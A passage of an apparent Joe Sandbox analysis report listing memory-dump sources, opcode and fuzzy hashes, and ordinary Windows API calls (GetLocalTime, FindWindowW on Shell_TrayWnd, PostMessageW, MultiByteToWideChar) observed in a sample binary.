                        • Opcode ID: cfca32d5fcf74e3c23eec205faf79a4394f0ef263544e519ada15106ebedda12
                        • Instruction ID: 996ad6aa05a0780af460ff6faea6e99afe08ee884a56d076e3b5a1bc4bcaa9d0
                        • Opcode Fuzzy Hash: cfca32d5fcf74e3c23eec205faf79a4394f0ef263544e519ada15106ebedda12
                        • Instruction Fuzzy Hash: 77E06D742007418FD370EFB8D4083967BE4BB41750F00892DE486C6691DBB5E4898BD1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: LocalTime
                        • String ID: %.3d$X64
                        • API String ID: 481472006-1077770165
                        • Opcode ID: 4a36c87842faa10372e9a8e45bfb4089f14d5c383fe6eb3e6f6d138c514dc721
                        • Instruction ID: aa5e9a92214382bab3c297f72aaa409282226908dfb45ec5f8b943dca1c180c6
                        • Opcode Fuzzy Hash: 4a36c87842faa10372e9a8e45bfb4089f14d5c383fe6eb3e6f6d138c514dc721
                        • Instruction Fuzzy Hash: 6FD012A588A108FACF509AD0DC459F9B37CBB58341F50CC53FA16E2140D63CD509A761
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A1232C
                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A1233F
                          • Part of subcall function 009EE97B: Sleep.KERNEL32 ref: 009EE9F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: ec4840a08b71d37bdc0d453fa15933740351100b2354408b3f9395a56d1b1c4a
                        • Instruction ID: 0f009ad5730e349dc4d0de18ffbf45ecc83de8fbde4da0d3e3f73832867fd680
                        • Opcode Fuzzy Hash: ec4840a08b71d37bdc0d453fa15933740351100b2354408b3f9395a56d1b1c4a
                        • Instruction Fuzzy Hash: 4CD022363C0300BBE264F3B0DC0FFC6BA05AB40B20F0089027305AA0D0C8F4A802CA04
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A1236C
                        • PostMessageW.USER32(00000000), ref: 00A12373
                          • Part of subcall function 009EE97B: Sleep.KERNEL32 ref: 009EE9F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: a2464e8656ab0cb8d2aff4a53203c5ecd4f30c575dfc267a93c71999e671ab1f
                        • Instruction ID: 396bf07dc02132c0bd956e1f0f84811879bb756fc25d4b72a9b06fdd58061543
                        • Opcode Fuzzy Hash: a2464e8656ab0cb8d2aff4a53203c5ecd4f30c575dfc267a93c71999e671ab1f
                        • Instruction Fuzzy Hash: 13D022323C03007BE264F3B0DC0FFC6B605AB40B20F0089027301EA0D0C8F4B802CA08
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 009BBE93
                        • GetLastError.KERNEL32 ref: 009BBEA1
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009BBEFC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$ErrorLast
                        • String ID:
                        • API String ID: 1717984340-0
                        • Opcode ID: 60633dedce710f7da0d3e7682e85ddef7226f356d7d58af127a6bd8a4b718992
                        • Instruction ID: c2a6e86a8bde627e5f41c6819e90b7fa9cacdf4f1e130173a08f2d5595f02957
                        • Opcode Fuzzy Hash: 60633dedce710f7da0d3e7682e85ddef7226f356d7d58af127a6bd8a4b718992
                        • Instruction Fuzzy Hash: 45410A34600206AFCF219FA4CE54BFABBA9EF42730F144169F9599B1E1DBB08D01CB90